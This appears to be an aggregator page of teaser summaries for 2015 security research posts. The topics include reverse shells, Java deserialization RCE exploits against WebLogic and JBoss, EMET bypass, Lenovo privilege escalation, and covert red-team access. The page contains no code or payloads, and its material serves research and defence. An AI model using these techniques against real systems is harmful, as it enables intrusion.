Friday December 25th
Friday December 18th
Thursday December 3rd
If you like exploitation surely you've had your own reverse or connect-back shells. Set up a listening netcat, run the payload and boom: you get a shell back! Then you explore the box, start a program, want to stop it, and do Ctrl-C... no!!! You just lost your shell, because that interrupted netcat, not the remote process. In this post we'll look at shells and terminals, from the most simple like this netcat with /bin/sh over the network, to a remote terminal emulator supporting terminal window size changes out of band. Think all the goodness SSH is doing for you, could we attempt something like it?
On December 1, 2015, a really interesting vulnerability was disclosed in the Dell Foundation Services software. If installed, a SOAP service will listen on port 7779 and grant an attacker the ability to execute unauthenticated WMI queries. I can’t say I’ve ever encountered such a vulnerability class so this posed an interesting thought exercise into how an attacker might effectively exploit such a vulnerability beyond just using the queries to conduct host recon. Specifically, this vulnerability only allows an attacker to query WMI object instances within the default namespace – ROOT/CIMv2. This means that you cannot invoke WMI methods or perform event registration - i.e. this is not a remote code execution vulnerability.
Tuesday December 1st
Wow! It may lead to remote command execution on modern Servlet environments. This was pointed out by Dan Amodio in 2012 with his art work exploit against Spring Double-Evaluation vulnerability (CVE-2011-2730). Herein he ported the exploitation technique presented in this Vulnerability Research Paper by Minded Security and Aspect Security in 2011 to newer Servlet versions reaching RCE (Remote Code Execution, which implies Remote Command Execution as well). In this blog post we discuss a different payload code to exploit an Expression Language Injection security issue in a reliable way. This is somehow the case during penetration tests of sensitive targets where it's important to not alter the local application by downloading external content or modifying the local file-system.
Lenovo released a new version of the Lenovo System Update advisory (https://support.lenovo.com/ar/es/product_security/lsu_privilege) about two new privilege escalation vulnerabilities I had reported to Lenovo a couple of weeks ago (CVE-2015-8109, CVE-2015-8110). IOActive and Lenovo have issued advisories on these issues. Before digging into the details, let’s go over a high-level overview of how the Lenovo System Update pops up the GUI application with Administrator privileges.
Just a few weeks ago I attended an amazing training on exploit development on Windows - Corelan Bootcamp. I have to admit, it’s probably the best instructor led course I have ever attended; massive props to Peter “corelanc0d3r” who is a fantastic teacher and to OJ “TheColonial” for organising it. Okay, with credits out of the way, let’s talk exploits! Since everything I learned at the bootcamp is still fresh in my head, I thought it will be good to practice it a bit more and make sure all of the information sinks in properly.
Inter Process Communication (IPC) is an ubiquitous part of modern computing. Processes often talk to each other and many software packages contain multiple components which need to exchange data to run properly. Named pipes are one of the many forms of IPC in use today and are extensively used on the Windows platform as a means to exchange data between running processes in a semi-persistent manner.
Monday November 16th
Sunday November 15th
Friday November 6th
The most underrated, underhyped vulnerability of 2015 has recently come to my attention, and I’m about to bring it to yours. No one gave it a fancy name, there were no press releases, nobody called Mandiant to come put out the fires. In fact, even though proof of concept code was released OVER 9 MONTHS AGO, none of the products mentioned in the title of this post have been patched, along with many more. In fact no patch is available for the Java library containing the vulnerability. In addition to any commercial products that are vulnerable, this also affects many custom applications. In this post I’ll be dropping pre-authentication, remote code execution exploits that leverage this vulnerability for WebLogic, WebSphere, JBoss, Jenkins, and OpenNMS. All on the newest versions. Even more interesting, I’ll detail the process we went through to discover that these products were vulnerable, and how I developed the exploits. This should empower you to go out and find this same bug in your own software or commercial products that you or your clients use. All code can be found on the FoxGlove Security Github.
Tuesday November 3rd
• While much of public vulnerability research focuses on pure 32-bit app exploitation, the fact is, a significant portion of 32-bit software is now running on 64-bit operating systems. • In this report, we’ll demonstrate a technique to bypass all payload/shellcode execution and ROP-related mitigations provided by EMET using the WoW64 compatibility layer provided in 64-bit Windows editions. • To demonstrate how we can bypass EMET by abusing WoW64, we’ll modify an existing use-after-free Adobe Flash exploit. • We’ll also discuss limitations and avenues of exploitation, obfuscation, and antiemulation imposed by WoW64 on 32-bit applications.
In this post I’ll be dropping a tool and set of techniques that red teams can use to maintain anonymous, covert access to compromised machines. I’ll also present some advice for defenders looking to detect and respond to these types of attack. This is not a brand new idea, but as far as I’m aware it hasn’t been very thoroughly discussed from the perspective of penetration testing and red teaming. Malware authors have been using these techniques since at least 2012. If they’re doing it, we should be too.
Wednesday October 14th
In this blog post, we’ll take a look at an example of a typical targeted attack with OS X malware as well as discover how to hunt for it in CrowdStrike’s Falcon Host Endpoint Activity Monitoring (EAM) application. One of the most unique features of this solution is that we don’t need to waste time or impact system performance by running any type of incident response script on the host. Using EAM negates the extra work of tracking down a computer, making sure it is on, dealing with possible network issues, and waiting for gigabytes of data to transfer back for analysis. The data is collected transparently and continuously, and it is always available for immediate search and analysis. We like to call this Instant Response.